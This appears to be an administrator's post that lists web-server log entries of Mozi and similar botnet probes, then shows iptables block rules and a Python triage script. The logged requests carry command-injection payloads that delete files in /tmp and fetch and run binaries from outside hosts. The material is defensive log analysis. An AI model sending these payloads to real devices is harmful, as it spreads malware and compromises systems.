Here is the list:
61.242.40.137 - - [31/May/2021:06:04:31 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
27.45.11.127 - - [31/May/2021:06:52:00 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://27.45.11.127:48083/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
209.141.33.232 - - [21/May/2021:03:57:39 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
182.121.231.1 - - [21/May/2021:04:07:59 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://182.121.231.1:59816/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
209.141.33.232 - - [21/May/2021:13:18:53 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
209.141.33.232 - - [21/May/2021:14:34:29 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
223.149.149.208 - - [21/May/2021:22:16:38 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
103.203.72.91 - - [20/May/2021:06:12:05 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
119.123.236.177 - - [20/May/2021:15:52:53 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://119.123.236.177:38918/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
117.241.51.177 - - [18/May/2021:17:30:58 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://117.241.51.177:45448/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
27.5.37.175 - - [18/May/2021:19:41:00 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://27.5.37.175:46657/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
59.97.193.131 - - [17/May/2021:06:05:42 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://59.97.193.131:57363/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
138.204.132.98 - - [28/May/2021:20:03:35 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ http://212.192.241.127/eb0t.sh;chmod+777+/tmp/eb0t.sh;sh+/tmp/eb0t.sh" 400 0 "-" "-"
59.63.206.200 - - [26/May/2021:00:59:08 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://101.232.115.188:57082/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
114.33.156.230 - - [26/May/2021:09:57:41 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://114.33.156.230:59246/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
68.150.109.112 - - [26/May/2021:17:05:02 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86+w00dy.jaws HTTP/1.1" 404 488 "-" "Hello, world"
209.141.33.232 - - [25/May/2021:02:00:39 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
209.141.33.232 - - [24/May/2021:03:15:26 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
209.141.33.232 - - [24/May/2021:05:17:24 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
209.141.33.232 - - [23/May/2021:11:11:12 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
209.141.33.232 - - [22/May/2021:12:33:25 +0200] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\\/45.14.149.244/arm7;chmod+777+arm7;./arm7+starcam;wget+http:/\\/45.14.149.244/arm;chmod+777+arm;./arm+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
Note that the IP 45.14.149.244 is in Romania and 27.45.11.127 is in China.
Result:
iptables -A INPUT -s 45.14.149.244 -j DROP
iptables -A INPUT -s 209.141.33.232 -j DROP
iptables -A INPUT -s 68.150.109.112 -j DROP
iptables -A INPUT -s 114.33.156.230 -j DROP
iptables -A INPUT -s 59.63.206.200 -j DROP
iptables -A INPUT -s 59.97.193.131 -j DROP
iptables -A INPUT -s 117.241.51.177 -j DROP
iptables -A INPUT -s 119.123.236.177 -j DROP
iptables -A INPUT -s 27.5.37.175 -j DROP
iptables -A INPUT -s 27.45.11.127 -j DROP
iptables -A INPUT -s 61.242.40.137 -j DROP
iptables -A INPUT -s 182.121.231.1 -j DROP
iptables-save > /etc/iptables/rules.v4
Misery.
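The same triage can be scripted. This Python sketch is an added example, not part of the original post: it extracts the client address and the download host from each `/shell?` request and builds DROP rules in the same form as above, skipping RFC 1918 addresses such as the 192.168.1.1 that appears in several of the requests. The sample log is constructed from documentation address ranges, and the names `scan` and `drop_rules` are assumptions.

```python
import ipaddress
import re

# Constructed sample in Apache combined log format (documentation IP ranges),
# modelled on the request shapes listed above; not lines from the post's log.
SAMPLE_LOG = r'''203.0.113.10 - - [31/May/2021:06:04:31 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 490 "-" "Hello, world"
198.51.100.7 - - [21/May/2021:03:57:39 +0200] "GET /shell?cd+/tmp;wget+http:/\\/192.0.2.44/arm7;chmod+777+arm7;./arm7+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
198.51.100.7 - - [21/May/2021:13:18:53 +0200] "GET /shell?cd+/tmp;wget+http:/\\/192.0.2.44/arm7;chmod+777+arm7;./arm7+starcam HTTP/1.1" 400 0 "-" "Pe7kata"
203.0.113.55 - - [28/May/2021:20:03:35 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ http://192.0.2.80/x.sh;chmod+777+/tmp/x.sh;sh+/tmp/x.sh" 400 0 "-" "-"
203.0.113.99 - - [28/May/2021:20:10:00 +0200] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
'''

RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# Client address and the quoted request line of one log entry.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)"')
# IPv4 host after wget: http://, escaped slashes, bare address, stray space.
FETCH = re.compile(r'wget[+\s]+(?:https?:[/\\]+)?(\d{1,3}(?:\.\d{1,3}){3})')

def scan(log_text):
    """Return (clients, payload_hosts) for requests whose path is /shell?..."""
    clients, hosts = set(), set()
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        client, request = m.groups()
        parts = request.split(" ", 2)
        if len(parts) < 2 or not parts[1].startswith("/shell?"):
            continue
        clients.add(client)
        hosts.update(FETCH.findall(request))
    return clients, hosts

def drop_rules(log_text):
    """Build DROP rules for public IPv4 addresses only, sorted numerically."""
    clients, hosts = scan(log_text)
    keep = []
    for ip in clients | hosts:
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:      # e.g. 999.1.1.1 matched by the loose regex
            continue
        if addr.version == 4 and not any(addr in net for net in RFC1918):
            keep.append(addr)
    return [f"iptables -A INPUT -s {a} -j DROP" for a in sorted(keep)]

if __name__ == "__main__":
    print("\n".join(drop_rules(SAMPLE_LOG)))
```

The script only prints the rules, so the list can be reviewed before anything is applied to the firewall.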